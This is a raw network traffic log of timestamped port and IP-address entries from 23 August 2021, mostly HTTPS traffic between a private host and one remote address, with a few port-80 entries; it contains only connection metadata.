Aug 23, 2021 02:08:58.341551065 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341556072 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341573954 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341579914 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341592073 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341603041 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341613054 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341624975 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341629028 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341648102 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341655970 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341669083 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341670036 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341696024 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341696024 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341720104 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341736078 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341739893 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341741085 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341757059 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341763020 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341777086 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341785908 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341795921 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341806889 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341830015 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341831923 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341850042 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341851950 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341871023 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341876030 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341892004 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341900110 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341922998 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341932058 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341936111 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341944933 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341967106 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341969967 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.341989040 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.341996908 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342010021 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342025995 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342031956 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342055082 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342056990 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342072010 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342080116 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342093945 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342102051 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342114925 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342123985 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342142105 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342145920 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342160940 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342168093 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342176914 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342200041 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342303038 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342328072 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342350006 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342355967 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342371941 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342371941 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342394114 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342401981 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342416048 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342441082 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342443943 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342464924 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342479944 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342485905 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342499018 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342508078 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342528105 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342529058 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342547894 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342550993 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342566967 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342575073 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342585087 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342597008 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342607975 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342622042 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342629910 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342644930 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342650890 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342668056 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342678070 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342689991 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342700005 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342711926 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342719078 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342732906 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342745066 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342755079 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342765093 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342776060 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342792988 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342801094 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342806101 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342824936 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342834949 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342845917 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342858076 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342869043 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342880011 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342891932 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342905998 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342914104 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342930079 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342936993 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342942953 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342958927 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342969894 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.342983961 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.342994928 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343007088 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343014002 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343028069 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343039989 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343050957 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343058109 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343072891 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343075991 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343095064 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343106031 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343125105 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343139887 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343163013 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343183994 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343183994 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343204021 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343208075 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343220949 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343230963 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343251944 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343262911 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343275070 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343281984 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343297005 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343301058 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343317986 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343321085 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343339920 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343352079 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343362093 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.343379974 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.343417883 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.344228029 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344252110 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344273090 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344275951 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.344295025 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344302893 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.344317913 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344335079 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.344360113 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344372034 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.344382048 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344403982 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344425917 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.344429016 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344445944 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.344485044 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.344496012 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347296000 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347325087 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347346067 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347368956 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347378969 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347392082 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347402096 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347415924 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347436905 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347439051 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347456932 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347460985 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347481966 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347486019 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347498894 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347508907 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347523928 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347529888 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347547054 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347553015 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347574949 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347575903 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347589970 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347595930 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347615004 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347619057 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347630024 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347640991 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347655058 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347666025 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347671032 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347687960 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347711086 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347714901 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347729921 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347733021 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347745895 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347754955 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347775936 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347783089 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347798109 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347815037 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347820997 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347842932 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347846985 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347870111 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347873926 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347892046 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347913980 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347920895 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347928047 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347929955 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347937107 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347950935 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.347960949 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347982883 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.347985983 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348006010 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348026991 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348030090 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348048925 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348053932 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348074913 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348074913 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348090887 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348097086 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348108053 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348119020 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348129988 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348140001 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348155022 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348160028 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348170042 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348187923 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348299980 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348325968 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348350048 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348350048 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348368883 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348387003 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348433971 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348438025 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348457098 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348474979 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348498106 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348520041 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348541975 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348543882 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348563910 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348586082 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348589897 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348601103 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348607063 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348612070 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348615885 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348618984 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348622084 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348670959 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348675013 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348725080 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348726988 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348771095 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348790884 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348813057 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348834991 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348834038 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348871946 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348876953 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.348880053 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.348922014 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.349014997 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.349073887 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.349215031 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.349319935 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.349468946 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.357943058 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359452009 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359479904 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359500885 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359525919 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359535933 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359549999 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359553099 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359570980 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359574080 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359597921 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359618902 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359641075 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359643936 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359652042 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359663010 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359663010 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359683990 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359694004 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359709978 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359720945 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359734058 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359750986 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359765053 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.359951973 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.359977961 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360001087 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360009909 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360023022 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360038996 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360044956 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360066891 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360068083 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360090017 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360095024 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360110998 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360115051 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360132933 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360132933 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360153913 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360157967 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360171080 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360181093 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360193014 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360203028 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360213995 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360225916 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360238075 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360260010 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.360788107 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360814095 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.360833883 CEST	49753	443	192.168.2.3	162.159.134.233
